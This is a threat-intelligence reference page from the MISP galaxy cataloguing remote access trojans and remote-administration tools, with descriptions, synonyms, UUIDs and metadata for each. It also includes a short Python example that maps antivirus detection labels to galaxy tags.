RAT

A remote administration tool or remote access tool (RAT), sometimes also called a remote access trojan, is software that lets a remote "operator" control a system as if they had physical access to it.

Authors and/or Contributors: Various

Iperius Remote

Iperius Remote is a commercial remote-desktop product. Its vendor advertises it as: remote control of any computer with Iperius Remote Desktop Free; for remote support or presentations; ideal for technical assistance; easy to use and secure.

Internal MISP references

UUID 5abe8673-4f85-440b-8860-de39fc1b671c which can be used as unique global reference for Iperius Remote in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

TeamViewer

TeamViewer is a proprietary computer software package for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.

Internal MISP references

UUID 8ee3c015-3088-4a5f-8c94-602c27d767c0 which can be used as unique global reference for TeamViewer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

JadeRAT

JadeRAT is one of numerous mobile surveillanceware families seen in recent months, indicating that actors continue to incorporate mobile tools in their attack chains. The threat actor using JadeRAT targets the mobile phones of ethnic minorities in China, notably Uighurs, for espionage.

Internal MISP references

UUID 1cc8963b-5ad4-4e19-8e9a-57b0ff1ef926 which can be used as unique global reference for JadeRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
cfr-suspected-state-sponsor China
cfr-suspected-victims ['Ethnic minorities in China']
cfr-target-category ['Government', 'Civil society']
cfr-type-of-incident Espionage
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

Back Orifice

Back Orifice (often shortened to BO) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location.

Synonyms

Alternate names or labels associated with Back Orifice.

Known Synonyms
BO
Internal MISP references

UUID 20204b13-8ad1-4147-9328-0a9a7ac010b6 which can be used as unique global reference for Back Orifice in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Netbus

NetBus or Netbus is a software program for remotely controlling a Microsoft Windows computer system over a network. It was created in 1998 and has been very controversial for its potential of being used as a backdoor.

Synonyms

Alternate names or labels associated with Netbus.

Known Synonyms
NetBus
Internal MISP references

UUID 81ff6e46-0ba4-458b-b3b0-750e86404cae which can be used as unique global reference for Netbus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1998

PoisonIvy

Poison Ivy is a RAT which was freely available and first released in 2005.

Synonyms

Alternate names or labels associated with PoisonIvy.

Known Synonyms
Backdoor.Win32.PoisonIvy
Gen:Trojan.Heur.PT
Poison Ivy
Internal MISP references

UUID 4e104fef-8a2c-4679-b497-6e86d7d47db0 which can be used as unique global reference for PoisonIvy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).
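
The UUIDs and synonym lists on this page exist so that tooling can resolve whatever name an analyst or AV product uses for a family to one global cluster reference. The following Python is an added example written for this page, not code from MISP or the galaxy project: it builds a small in-memory copy of a few clusters taken from this page (PoisonIvy, Sub7, Netbus, Adwind RAT) and resolves canonical names, synonyms and AV detection labels to the cluster UUID and the corresponding MISP galaxy tag. The JSON layout (value, uuid, meta.synonyms) is assumed to mirror the galaxy cluster files, and the sample detection labels are constructed for the demonstration.

```python
import json
import re

# Constructed excerpt of the "rat" galaxy. UUIDs and synonyms are taken from the
# entries on this page; the value/uuid/meta.synonyms layout is assumed to mirror
# the MISP galaxy cluster JSON format.
RAT_GALAXY_JSON = json.dumps({
    "name": "RAT",
    "type": "rat",
    "values": [
        {"value": "PoisonIvy",
         "uuid": "4e104fef-8a2c-4679-b497-6e86d7d47db0",
         "meta": {"synonyms": ["Backdoor.Win32.PoisonIvy", "Gen:Trojan.Heur.PT", "Poison Ivy"]}},
        {"value": "Sub7",
         "uuid": "d7369f05-65ce-4e10-916f-41f2f6d4ab59",
         "meta": {"synonyms": ["Sub7Server", "SubSeven"], "date": "1999"}},
        {"value": "Netbus",
         "uuid": "81ff6e46-0ba4-458b-b3b0-750e86404cae",
         "meta": {"synonyms": ["NetBus"], "date": "1998"}},
        {"value": "Adwind RAT",
         "uuid": "b76d9845-815c-4e77-9538-6b737269da2f",
         "meta": {"synonyms": ["AlienSpy", "Frutas", "JBifrost", "Jsocket", "UNRECOM", "Unrecom"]}},
    ],
})


def normalize(name):
    """Fold case and drop punctuation/whitespace so 'Poison Ivy', 'poison-ivy'
    and 'PoisonIvy' all map to the same lookup key."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


class RatGalaxy:
    """Index of a galaxy's clusters by UUID and by every name or synonym."""

    def __init__(self, galaxy_json):
        galaxy = json.loads(galaxy_json)
        self.type = galaxy["type"]
        self.by_uuid = {}
        self.by_name = {}
        for cluster in galaxy["values"]:
            self.by_uuid[cluster["uuid"]] = cluster
            names = [cluster["value"]] + cluster.get("meta", {}).get("synonyms", [])
            for name in names:
                key = normalize(name)
                other = self.by_name.get(key)
                # Refuse to build an index in which one alias points at two
                # clusters: silently picking one would mislabel events.
                if other is not None and other["uuid"] != cluster["uuid"]:
                    raise ValueError(
                        f"alias {name!r} is ambiguous: {other['value']} vs {cluster['value']}")
                self.by_name[key] = cluster

    def resolve(self, label):
        """Map a canonical name, synonym or AV detection label to
        (canonical value, UUID); None when the galaxy has no match."""
        cluster = self.by_name.get(normalize(label))
        return (cluster["value"], cluster["uuid"]) if cluster else None

    def tag(self, label):
        """MISP galaxy tag for the cluster a label resolves to, in the
        misp-galaxy:<type>="<value>" form MISP attaches to events."""
        hit = self.resolve(label)
        return None if hit is None else f'misp-galaxy:{self.type}="{hit[0]}"'

    def name_for_uuid(self, uuid):
        cluster = self.by_uuid.get(uuid)
        return cluster["value"] if cluster else None


def tag_detections(galaxy, detections):
    """Turn a batch of AV/EDR detection labels into galaxy tags, keeping the
    labels the galaxy cannot resolve so an analyst can review them."""
    tagged, unresolved = {}, []
    for label in detections:
        tag = galaxy.tag(label)
        if tag is None:
            unresolved.append(label)
        else:
            tagged[label] = tag
    return tagged, unresolved


# Constructed sample of detection names as an AV product or sandbox might report them.
SAMPLE_DETECTIONS = [
    "Backdoor.Win32.PoisonIvy",
    "Trojan:Java/AlienSpy",   # vendor-prefixed, not an exact synonym: stays unresolved
    "sub seven",
    "NetBus",
    "Zeus",                   # not a RAT cluster on this page: stays unresolved
]

if __name__ == "__main__":
    galaxy = RatGalaxy(RAT_GALAXY_JSON)
    tags, leftover = tag_detections(galaxy, SAMPLE_DETECTIONS)
    for label, tag in tags.items():
        print(f"{label:28} -> {tag}")
    print("unresolved:", leftover)
```

Matching is deliberately exact after normalisation: a vendor-prefixed label such as "Trojan:Java/AlienSpy" is left unresolved rather than fuzzily matched, because a wrong galaxy tag on a shared MISP event propagates to every community that pulls it. The index also refuses to load a galaxy in which one alias belongs to two clusters, which is the failure mode to watch for when merging locally maintained synonyms with the upstream list.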

Sub7

Sub7, or SubSeven or Sub7Server, is a Trojan horse program.[1] Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven". Sub7 was created by Mobman. Mobman has not maintained or updated the software since 2004, however an author known as Read101 has carried on the Sub7 legacy.

Synonyms

Alternate names or labels associated with Sub7.

Known Synonyms
Sub7Server
SubSeven
Internal MISP references

UUID d7369f05-65ce-4e10-916f-41f2f6d4ab59 which can be used as unique global reference for Sub7 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1999

Beast Trojan

Beast is a Windows-based backdoor trojan horse, more commonly known in the hacking community as a Remote Administration Tool or a "RAT". It is capable of infecting versions of Windows from 95 to 10.

Internal MISP references

UUID 268a4f81-dbfd-4b20-9a54-24eba7a4c781 which can be used as unique global reference for Beast Trojan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Bifrost

Bifrost is a discontinued backdoor trojan horse family of more than 10 variants which can infect Windows 95 through Windows 10 (although on modern Windows systems, after Windows XP, its functionality is limited). Bifrost uses the typical server, server builder, and client backdoor program configuration to allow a remote attacker, who uses the client, to execute arbitrary code on the compromised machine (which runs the server whose behavior can be controlled by the server editor).

Internal MISP references

UUID eb62bac0-68fd-4b17-af4f-89c6900ee414 which can be used as unique global reference for Bifrost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2004

Blackshades

Blackshades is the name of a malicious trojan horse used by hackers to control computers remotely. The malware targets computers running Microsoft Windows-based operating systems.[2] According to US officials, over 500,000 computer systems worldwide have been infected with the software.

Internal MISP references

UUID 3a1fc564-3705-4cc0-8f80-13c58d470d34 which can be used as unique global reference for Blackshades in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

DarkComet

DarkComet is a Remote Administration Tool (RAT) which was developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from the United Kingdom. Although the RAT was developed back in 2008, it began to proliferate at the start of 2012.

Synonyms

Alternate names or labels associated with DarkComet.

Known Synonyms
Dark Comet
Internal MISP references

UUID 8a21ae06-d257-48a0-989b-1c9aebedabc2 which can be used as unique global reference for DarkComet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2008
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

Lanfiltrator

Backdoor.Lanfiltrator is a backdoor Trojan that gives an attacker unauthorized access to a compromised computer. The detection is used for a family of Trojans that are produced by the Backdoor.Lanfiltrator generator.

Internal MISP references

UUID 826e73f8-2241-4c99-848d-8597d685cfd3 which can be used as unique global reference for Lanfiltrator in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Win32.HsIdir

Win32.HsIdir is a remote administration tool by its original author, HS32-Idir, developed from a release first made in 2006 (Copyright © 2006-2010 HS32-Idir).

Internal MISP references

UUID 569d539f-f949-4156-8896-108ea8352fbc which can be used as unique global reference for Win32.HsIdir in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Optix Pro

Optix Pro is a configurable remote access tool or Trojan, similar to SubSeven or BO2K.

Internal MISP references

UUID 4ce3247b-203a-42a8-aaa0-05558c50894e which can be used as unique global reference for Optix Pro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Back Orifice 2000

Back Orifice 2000 (often shortened to BO2k) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location. The name is a pun on Microsoft's BackOffice Server software. Back Orifice 2000 is a new version of the well-known Back Orifice backdoor trojan (a hacker's remote access tool). It was created by the Cult of the Dead Cow hacker group in July 1999. Originally BO2K was released as a source code and utilities package on a CD-ROM. There are reports that some files on that CD-ROM were infected with the CIH virus, so people who got that CD might have been infected and spread not only the compiled backdoor but also the CIH virus.

Synonyms

Alternate names or labels associated with Back Orifice 2000.

Known Synonyms
BO2k
Internal MISP references

UUID 91f8a1d8-c816-45e1-8c26-17a7305ca375 which can be used as unique global reference for Back Orifice 2000 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1998

RealVNC

The software consists of a server and client application for the Virtual Network Computing (VNC) protocol to control another

Synonyms

Alternate names or labels associated with RealVNC.

Known Synonyms
VNC Connect
VNC Viewer
Internal MISP references

UUID e1290288-84d4-4b32-858d-db4ed612de44 which can be used as unique global reference for RealVNC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Adwind RAT

Backdoor:Java/Adwind is a Java archive (.JAR) file that drops a malicious component onto the machines and runs as a backdoor. When active, it is capable of stealing user information and may also be used to distribute other malware.

Synonyms

Alternate names or labels associated with Adwind RAT.

Known Synonyms
AlienSpy
Frutas
JBifrost
Jsocket
UNRECOM
UNiversal REmote COntrol Multi-Platform
Unrecom
Internal MISP references

UUID b76d9845-815c-4e77-9538-6b737269da2f which can be used as unique global reference for Adwind RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2011
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

Albertino Advanced RAT

Internal MISP references

UUID eff22ed3-81fc-4055-bd1d-76e1f191f487 which can be used as unique global reference for Albertino Advanced RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Arcom

The malware is a Remote Access Trojan (RAT), known as Arcom RAT, and it is sold on underground forums for $2000.00.

Internal MISP references

UUID cd167b01-dc63-4576-b4a1-5ee707aa392b which can be used as unique global reference for Arcom in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

BlackNix

BlackNix is a RAT coded in Delphi.

Internal MISP references

UUID f3e79212-0e35-40d2-a1d6-37b629a8138e which can be used as unique global reference for BlackNix in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Blue Banana

Blue Banana is a RAT (Remote Administration Tool) written purely in Java.

Internal MISP references

UUID 9b515229-36f6-4b93-9889-36116a12fd74 which can be used as unique global reference for Blue Banana in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012

Bozok

Bozok, like many other popular RATs, is freely available. The author of the Bozok RAT goes by the moniker “Slayer616” and has created another RAT known as Schwarze Sonne, or “SS-RAT” for short. Both of these RATs are free and easy to find — various APT actors have used both in previous targeted attacks.

Internal MISP references

UUID 41f45758-0376-42a8-bc07-8f2ffbee3ad2 which can be used as unique global reference for Bozok in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2013
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

ClientMesh

ClientMesh is a remote administration application which allows a user to control a number of client PCs from around the world.

Internal MISP references

UUID 03eb6742-9a17-4aed-95e4-d8a0b0abefc3 which can be used as unique global reference for ClientMesh in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

CyberGate

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi and under continuous development. Using CyberGate the operator can log the victim's passwords and capture screenshots of the victim's screen.

Internal MISP references

UUID c3cf4e88-704b-4d7c-8185-ee780804f3d3 which can be used as unique global reference for CyberGate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2011
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

Dark DDoSeR

Internal MISP references

UUID 3c026104-6129-4749-9b41-07c28d9e84c4 which can be used as unique global reference for Dark DDoSeR in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DarkRat

In March 2017, Fujitsu Cyber Threat Intelligence uncovered a newly developed remote access tool referred to by its developer as ‘Dark RAT’ – a tool used to steal sensitive information from victims. Offered as a Fully Undetectable build (FUD) the RAT has a tiered price model including 24/7 support and an Android version. Android malware has seen a significant rise in interest and in 2015 this resulted in the arrests of a number of suspects involved in the infamous DroidJack malware.

Synonyms

Alternate names or labels associated with DarkRat.

Known Synonyms
DarkRAT
Internal MISP references

UUID 7135cc9c-a7bf-44fc-b74b-80de9edd9438 which can be used as unique global reference for DarkRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2005

Greame

Internal MISP references

UUID e880a029-bb01-4a64-baa3-b13fc2af4e9d which can be used as unique global reference for Greame in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

HawkEye

HawkEye is a popular RAT that can be used as a keylogger; it is also able to identify login events and record the destination, username, and password.

Internal MISP references

UUID 8414f79c-a879-44b6-b154-4992aa12dff1 which can be used as unique global reference for HawkEye in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2003

jRAT

jRAT is a cross-platform remote administration tool coded in Java. Because it is written in Java it can run on any operating system with a Java runtime, including Windows, Mac OS X and Linux distributions.

Synonyms

Alternate names or labels associated with jRAT.

Known Synonyms
JacksBot
Internal MISP references

UUID 1df62d96-88f8-473c-94a2-252eb360ba62 which can be used as unique global reference for jRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

jSpy

jSpy is a Java RAT.

Internal MISP references

UUID 669a0e4d-9760-49fc-bdf5-0471f84e0c76 which can be used as unique global reference for jSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2013
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

LuxNET

LuxNET is a poorly coded RAT by XilluX, widely dismissed in the underground as script-kiddie work: the connection is very unstable, the GUI flickers constantly because of bad multithreading, and it has many other bugs.

Internal MISP references

UUID aad1038d-4d50-4a3e-88f3-cd9d154dc45c which can be used as unique global reference for LuxNET in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

NJRat

NJRat is a remote access trojan (RAT), first spotted in June 2013 with samples dating back to November 2012. It was developed and is supported by Arabic speakers and mainly used by cybercrime groups against targets in the Middle East. In addition to targeting some governments in the region, the trojan is used to control botnets and conduct other typical cybercrime activity. It infects victims via phishing attacks and drive-by downloads and propagates through infected USB keys or networked drives. It can download and execute additional malware, execute shell commands, read and write registry keys, capture screenshots, log keystrokes, and spy on webcams.

Synonyms

Alternate names or labels associated with NJRat.

Known Synonyms
Njw0rm
Internal MISP references

UUID 7fb493bb-756b-42a2-8f6d-59e254f4f2cc which can be used as unique global reference for NJRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

Pandora

Pandora is a remote administration tool developed for the Windows operating system. It is built on a client/server architecture and is described by its author as feature-rich and stable.

Internal MISP references

UUID 59485642-d233-4167-9f51-bd1d74285c23 which can be used as unique global reference for Pandora in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Predator Pain

Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable, which is good if you are managing a few infected machines only, but the design doesn’t scale well when there are a lot of infected machines and logs involved.

Synonyms

Alternate names or labels associated with Predator Pain.

Known Synonyms
PredatorPain
Internal MISP references

UUID 42a97a5d-ee33-492a-b20f-758ecdbf1aed which can be used as unique global reference for Predator Pain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

Punisher RAT

Remote administration tool

Internal MISP references

UUID e49af83c-fd2f-4540-92dc-97c7b84a9458 which can be used as unique global reference for Punisher RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2007

SpyGate

SpyGate is a tool that allows the operator to control a computer from anywhere in the world, with full Unicode language support.

Internal MISP references

UUID 1c3df89a-1f30-4ccb-acb4-5dee4b470b55 which can be used as unique global reference for SpyGate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Small-Net

RAT

Synonyms

Alternate names or labels associated with Small-Net.

Known Synonyms
SmallNet
Internal MISP references

UUID 1dd0c7f8-a6fb-4912-9de9-deb43f384fdb which can be used as unique global reference for Small-Net in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Vantom

Vantom is a free RAT described by its author as having good options and being very stable.

Internal MISP references

UUID 6e5a1fcb-f730-4d8d-890a-ef133782a7d2 which can be used as unique global reference for Vantom in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Xena

Xena RAT is a fully functional, stable, state-of-the-art RAT coded in Delphi; because Delphi compiles to native code, it has almost no dependencies.

Internal MISP references

UUID b9d5ab11-dd6f-49ba-8117-ce16f71ff11c which can be used as unique global reference for Xena in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

XtremeRAT

This malware has been used in targeted attacks as well as traditional cybercrime. During our investigation we found that the majority of XtremeRAT activity is associated with spam campaigns that typically distribute Zeus variants and other banking-focused malware.

Internal MISP references

UUID 3b6b55fb-595c-40c5-bbc5-dbe244b15026 which can be used as unique global reference for XtremeRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Netwire

NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers.

Internal MISP references

UUID e3113a0e-a65b-4119-8bc2-1c8d9d18c2db which can be used as unique global reference for Netwire in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012

Gh0st RAT

Gh0st RAT is a Trojan horse for the Windows platform that the operators of GhostNet used to break into some of the most sensitive computer networks on Earth. It is a cyber-espionage program.

Internal MISP references

UUID 255a59a7-db2d-44fc-9ca9-5859b65817c3 which can be used as unique global reference for Gh0st RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2001
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

Plasma RAT

Plasma RAT's stub is fairly advanced and has many robust features, including bot killing, cryptocurrency mining (CPU and GPU), persistence, anti-analysis, torrent seeding, an AV killer, seven DDoS methods and a keylogger. The RAT is coded in VB.NET. There is also a botnet version (Plasma HTTP), which is very similar to the RAT version.

Internal MISP references

UUID af534ddb-d0c6-47c0-82be-058c8bd5c6e1 which can be used as unique global reference for Plasma RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Babylon

Babylon is a highly advanced remote administration tool with no dependencies. The server is developed in C++, chosen for performance, and the client in C# (.NET Framework 4.5).

Internal MISP references

UUID ad1c9a50-3cd2-446a-ab31-9ecb62980d61 which can be used as unique global reference for Babylon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Imminent Monitor

RAT

Internal MISP references

UUID f52a5252-ef53-4935-81c8-96fffcd1b952 which can be used as unique global reference for Imminent Monitor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DroidJack

DroidJack is a Java-based RAT (Remote Access Trojan/Remote Administration Tool) for the Android mobile OS, providing remote access, monitoring and management. From a PC, an operator can take complete remote control of any Android device infected with DroidJack. It has powerful functions and a user-friendly interface, and lets attackers fully take over the phone and steal or record the victim's private data at will.

Internal MISP references

UUID 7f032293-bfa2-4595-803d-c84519190861 which can be used as unique global reference for DroidJack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Quasar RAT

Quasar is a fast and lightweight remote administration tool coded in C#, providing high stability and an easy-to-use interface.

Internal MISP references

UUID 6efa425c-3731-44fd-9224-2a62df061a2d which can be used as unique global reference for Quasar RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2014
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

Dendroid

Dendroid is malware that affects Android OS and targets the mobile platform. It was first discovered in early 2014 by Symantec and appeared for sale in the underground for $300. Notable features included the ability to hide from emulators at the time. When discovered in 2014 it was one of the most sophisticated Android remote administration tools then known. It was one of the first Trojan applications to get past Google's Bouncer, and it led researchers to warn that creating Android malware had become easier. It also followed in the footsteps of Zeus and SpyEye by having simple-to-use command and control panels. The code appears to have been leaked around 2014; an APK binder was included in the leak, providing a simple way to bind Dendroid to legitimate applications.

Internal MISP references

UUID ea3a8c25-4adb-4538-bf11-55259bdba15f which can be used as unique global reference for Dendroid in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2014
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

Ratty

A Java R.A.T. program

Internal MISP references

UUID a51f07ae-ab2c-45ee-aa9c-1db7873e7bb4 which can be used as unique global reference for Ratty in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters: this entry links to related clusters in the MISP galaxy (not listed here).

RaTRon

Java RAT

Internal MISP references

UUID 48b6886b-67a9-4815-92a2-1b7aca24d4ac which can be used as unique global reference for RaTRon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Arabian-Attacker RAT

Internal MISP references

UUID f966a936-19f9-4b6b-95b3-0ff102e26303 which can be used as unique global reference for Arabian-Attacker RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2006

Androrat

Androrat is a client/server application; the client is developed in Java for Android and the server in Java/Swing.

Internal MISP references

UUID ce70bf96-0629-4c7d-8ed8-2315fab0ed42 which can be used as unique global reference for Androrat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Adzok

Remote Administrator

Internal MISP references

UUID 3560c833-3d28-4888-b0b8-1951ecac57a2 which can be used as unique global reference for Adzok in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Schwarze-Sonne-RAT

Synonyms

Alternate names or labels associated with Schwarze-Sonne-RAT.

Known Synonyms
SS-RAT
Schwarze Sonne
Internal MISP references

UUID 99860df7-565d-47e4-a086-c4af1623b626 which can be used as unique global reference for Schwarze-Sonne-RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Cyber Eye RAT

Internal MISP references

UUID 729f1b02-ce0c-41a4-8d4e-c7c1f5475c4b which can be used as unique global reference for Cyber Eye RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Batch NET

Internal MISP references

UUID 9501172b-a81a-49bb-90ce-31f2fb78a130 which can be used as unique global reference for Batch NET in MISP communities and other software using the MISP galaxy

RWX RAT

Internal MISP references

UUID 62c5b489-8750-4fab-aca3-b233af789831 which can be used as unique global reference for RWX RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Spynet

Spy-Net is software that allows the operator to control any computer in the world running the Windows operating system. It has returned with new functions and good options to give full control of the remote computer. Stable and fast, it offers a good interface that makes all of its functions easy to use.

Internal MISP references

UUID 66bfd62e-6626-4104-af37-a44244204ac8 which can be used as unique global reference for Spynet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

CTOS

Internal MISP references

UUID b9d7d5b8-7cf4-4650-a88a-5f4e991c45d6 which can be used as unique global reference for CTOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Virus RAT

Internal MISP references

UUID 9107fc0d-6705-4fc2-b621-e5ac42afef90 which can be used as unique global reference for Virus RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Atelier Web Remote Commander

Internal MISP references

UUID c51188d6-d489-4a18-a9a8-e38365f0bc10 which can be used as unique global reference for Atelier Web Remote Commander in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

drat

A distributed, parallelized (MapReduce) wrapper around Apache RAT that lets it complete on large code repositories of multiple file types where Apache RAT hangs forever. Note that Apache RAT here is the Apache Release Audit Tool, a license-header checker, not a remote access tool; this entry is a name collision rather than malware.

Internal MISP references

UUID 5ee39172-7ba3-477c-9772-88841b4be691 which can be used as unique global reference for drat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

MoSucker

MoSucker is a powerful backdoor - hacker's remote access tool.

Internal MISP references

UUID 611ed43b-b869-4419-a487-6f7393125eb3 which can be used as unique global reference for MoSucker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Theef

Internal MISP references

UUID f5154f40-46c1-4a0d-9814-cb5e5adf201b which can be used as unique global reference for Theef in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

ProRat

ProRat is a Microsoft Windows based backdoor trojan, more commonly known as a Remote Administration Tool. As with other trojan horses it uses a client and server. ProRat opens a port on the computer which allows the client to perform numerous operations on the server (the machine being controlled).

Internal MISP references

UUID cae67963-63d2-4c8b-8358-a03556f20b7b which can be used as unique global reference for ProRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Setro

Internal MISP references

UUID 6b1b2415-b42f-41c4-8c35-077844a9c4dc which can be used as unique global reference for Setro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Indetectables RAT

Internal MISP references

UUID 36912ecf-9411-44fa-b14d-ec3b6896b0e2 which can be used as unique global reference for Indetectables RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Luminosity Link

Internal MISP references

UUID 0f2c6cd4-675a-4c41-acf5-1b0bc3625375 which can be used as unique global reference for Luminosity Link in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Orcus

Internal MISP references

UUID 30a1a10e-4155-43a6-854a-3b43bc2a3f9c which can be used as unique global reference for Orcus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015

Blizzard

Internal MISP references

UUID a7e4c2ff-6747-48e4-99c4-5c638c167fc0 which can be used as unique global reference for Blizzard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Kazybot

Internal MISP references

UUID 6c553273-f3f8-4e66-b764-9a9ae83a2f35 which can be used as unique global reference for Kazybot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

BX

Internal MISP references

UUID f6cc85de-81da-4276-a87c-45e3a00b67b5 which can be used as unique global reference for BX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2014

death

Internal MISP references

UUID b7095617-3320-4118-9f28-7d4356e2571a which can be used as unique global reference for death in MISP communities and other software using the MISP galaxy

Sky Wyder

Internal MISP references

UUID 866f97d7-faa9-49e2-b704-7406c1ee2565 which can be used as unique global reference for Sky Wyder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DarkTrack

Internal MISP references

UUID f60dc9e3-2053-446c-89a0-ad69906de6e4 which can be used as unique global reference for DarkTrack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

xRAT

Free, Open-Source Remote Administration Tool. xRAT 2.0 is a fast and light-weight Remote Administration Tool coded in C# (using .NET Framework 2.0).

Internal MISP references

UUID 509aff15-ba17-4582-b1a0-b0ed89df01d8 which can be used as unique global reference for xRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

Biodox

Internal MISP references

UUID 43e91752-23f5-41c6-baa3-74d6fc0f2cad which can be used as unique global reference for Biodox in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Offence

Offense RAT is a free remote administration tool written in Delphi 9.

Internal MISP references

